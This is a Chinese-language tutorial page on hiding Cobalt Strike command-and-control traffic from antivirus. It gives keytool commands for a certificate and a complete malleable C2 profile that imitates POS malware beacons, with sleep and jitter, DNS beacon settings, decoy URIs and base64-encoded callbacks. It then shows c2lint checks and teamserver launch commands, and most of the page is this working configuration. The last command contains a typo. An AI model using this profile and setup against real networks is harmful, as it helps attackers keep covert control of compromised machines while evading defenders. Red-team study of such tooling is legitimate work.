CobaltStrike流量加密

前言

虽然Cobalt Strike流量自带SSL证书, 不过大多数情况下都会被杀软查杀, 因此需要自行配置证书来进行加密

操作步骤

1.生成证书

在kali上使用keytool生成证书，随后要求输入口令, 此处我设置的口令是qq123456, 口令要记住, 因为后面配置c2.profile文件用得上

后面的内容除了最后一处填写y, 其他的随便填即可, 不过这些信息后面也要填写

keytool -genkey -alias henry -keyalg RSA -validity 36500 -keystore henry.store

-alias和-keystore后面接的参数后面也会用到

2.创建c2.profile文件

#设置样本名字
set sample_name "tryblog POS Malware";  
 
set sleeptime "5000"; # use a ~30s delay between callbacks
set jitter    "10";    # throw in a 10% jitter
 
set useragent "Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0";
 
#设置证书，注意以下内容得和你之前生成的证书一样
https-certificate {
    set CN       "test"; 
    set O        "test";   
    set C        "test";
    set L        "test";
    set OU       "test";  
    set ST       "test";
    set validity "365";
}

#设置，修改成你的证书名称和证书密码
code-signer{
    set keystore "henry.store";
    set password "qq123456";
    set alias "henry";
}
 
#指定DNS beacon不用的时候指定到IP地址
set dns_idle "8.8.4.4";
 
#每个单独DNS请求前强制睡眠时间
set dns_sleep "0";
 
#通过DNS上载数据时主机名的最大长度[0-255]
set maxdns    "235";
 
http-post {
    set uri "/windebug/updcheck.php /aircanada/dark.php /aero2/fly.php /windowsxp/updcheck.php /hello/flash.php";
 
    client {
        header "Accept" "text/plain";
        header "Accept-Language" "en-us";
        header "Accept-Encoding" "text/plain";
        header "Content-Type" "application/x-www-form-urltrytryd";
 
        id {
            netbios;
            parameter "id";
        }
 
        output {
            base64;
            prepend "&op=1&id=vxeykS&ui=Josh @ PC&wv=11&gr=backoff&bv=1.55&data=";
            print;
        }
    }
 
    server {
        output {
            print;
        }
    }
}
 
http-get {
    set uri "/updates";
 
    client {
        metadata {
            netbiosu;
            prepend "user=";
            header "Cookie";
        }
    }
 
    server {
        header "Content-Type" "text/plain";
 
        output {
            base64;
            print;
        }
    }
}

3.验证c2.profile文件

将创建的c2.profile和生成的证书文件henry.store放到Cobalt Strike文件目录中, 随后执行如下命令验证证书

./c2lint c2.profile

4.修改CS团队服务器的默认端口

修改teamserver文件, 然后将鼠标光标移动至文件末尾, 将默认端口50050修改成其他的, 此处我修改成12345

5.启动CS团队服务器

直接通过cs.profile文件启动CS团队服务器,也可以加个nohup命令在后台启动团队服务器

./teamserver 192.168.47.134 qq123456 ./c2.profile

nohup ./teamserver 192.168.47.134 qq123456 ./c2.profil

参考文章

https://www.nctry.com/1655.html#title-3
https://www.yisu.com/zixun/501167.html

上一页流量加密下一页MsfShell流量加密

最后更新于1年前